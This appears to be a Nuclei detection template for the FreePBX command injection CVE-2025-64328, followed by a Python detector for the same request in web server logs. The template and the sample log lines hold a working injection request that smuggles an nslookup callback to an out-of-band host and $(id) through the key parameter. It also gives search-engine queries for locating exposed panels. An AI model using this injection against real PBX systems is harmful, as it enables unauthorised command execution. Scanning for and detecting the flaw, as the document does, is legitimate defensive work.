id: CVE-2025-64328

info:
  name: FreePBX - Authenticated Command Injection in Administration panel
  author: _th3y
  severity: high
  description: |
    FreePBX 17 contains a command injection caused by insufficiently sanitized user-supplied data in the
    testconnection -> check_ssh_connect() function of the filestore module. An authenticated administrator
    who can reach the module's SSH "test connection" action can execute arbitrary shell commands as the
    asterisk user.
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 8.6
    cve-id: CVE-2025-64328
    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
    - https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
  metadata:
    vendor: sangoma
    product: freepbx
    shodan-query:
      - http.title:"freepbx"
      - http.favicon.hash:"-1908328911"
      - http.favicon.hash:"1574423538"
      - http.title:"freepbx administration"
    fofa-query:
      - icon_hash="-1908328911"
      - icon_hash="1574423538"
      - title="freepbx administration"
      - title="freepbx"
    google-query:
      - intitle:"freepbx administration"
      - intitle:"freepbx"
  tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  # Out-of-band callback: a successful injection resolves the interactsh hostname from the PBX.
  cmd: "nslookup {{interactsh-url}}"
  prefix: "{{rand_text_alpha(5)}}"

# Step 2 only runs when the login in step 1 matched (internal matcher).
flow: http(1) && http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/admin/config.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "username={{username}}&password={{password}}"
    matchers:
      - type: word
        part: body
        words:
          - 'FreePBX Administration'
          - 'Hello, {{username}}'
        condition: and
        internal: true

  - method: GET
    # The key parameter is interpolated into the SSH test command; the backticks carry the payload.
    path:
      - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
    headers:
      Referer: "{{BaseURL}}"
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
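The template above confirms the flaw from the outside via an out-of-band callback. On the defensive side, the same request shape is easy to spot in web server logs: a GET to /admin/ajax.php with module=filestore&command=testconnection whose parameters carry shell metacharacters after URL decoding. The following detector is an added example written for this page; it is not part of the Nuclei template or of FreePBX. It assumes Apache/nginx combined log format and uses constructed, hypothetical log lines (hosts such as pbx.example and abc.oast.example are invented), including one legitimate connection test so the rule is shown not to fire on ordinary admin activity.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; these are not real traffic.
# Line 2 mirrors the template's request with the backtick payload percent-encoded (%60),
# line 3 is a legitimate SSH connection test by an admin, line 4 uses $( ) instead of backticks.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2025:10:01:02 +0000] "POST /admin/config.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Nov/2025:10:01:03 +0000] "GET /admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=abcde&port=22&key=abcde%60nslookup%20abc.oast.example%60&path=abcde HTTP/1.1" 200 87 "http://pbx.example/" "Mozilla/5.0"
10.0.0.7 - - [12/Nov/2025:10:05:44 +0000] "GET /admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=backup.example&user=backup&port=22&key=/home/asterisk/.ssh/id_rsa&path=/backups HTTP/1.1" 200 87 "http://pbx.example/" "Mozilla/5.0"
10.0.0.9 - - [12/Nov/2025:10:07:10 +0000] "GET /admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=x&port=22&key=x%24%28id%29&path=x HTTP/1.1" 200 87 "-" "curl/8.0"
"""

# client ip, timestamp, method and request target from a combined-format line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Characters that change the meaning of a value spliced into a shell command line.
# Matched against decoded values, so %60 and a literal backtick are treated the same.
SHELL_META_RE = re.compile(r'[`;|\n]|\$\(')


def is_testconnection_injection(target):
    """Return True if `target` is a filestore testconnection request whose decoded
    parameters contain shell metacharacters (the CVE-2025-64328 request shape)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/ajax.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if params.get("module") != ["filestore"] or params.get("command") != ["testconnection"]:
        return False
    return any(SHELL_META_RE.search(v) for values in params.values() for v in values)


def find_injection_attempts(log_text):
    """Scan combined-format log text and return (ip, timestamp, target) for each hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        if is_testconnection_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, ts, target in find_injection_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious filestore testconnection: {target}")
```

The check deliberately inspects every parameter rather than only `key`, since any value that reaches the command line is a candidate, and it decodes before matching so that `%60` and a raw backtick are treated alike. Matching on the endpoint alone would be noisy: the third sample line is an ordinary connection test and does not fire. A hit is an indicator, not proof of compromise; because the template's request is only reachable after a successful login, a hit should be correlated with the preceding POST to /admin/config.php and with DNS or HTTP egress from the PBX itself, which is the out-of-band signal the template's interactsh matcher relies on.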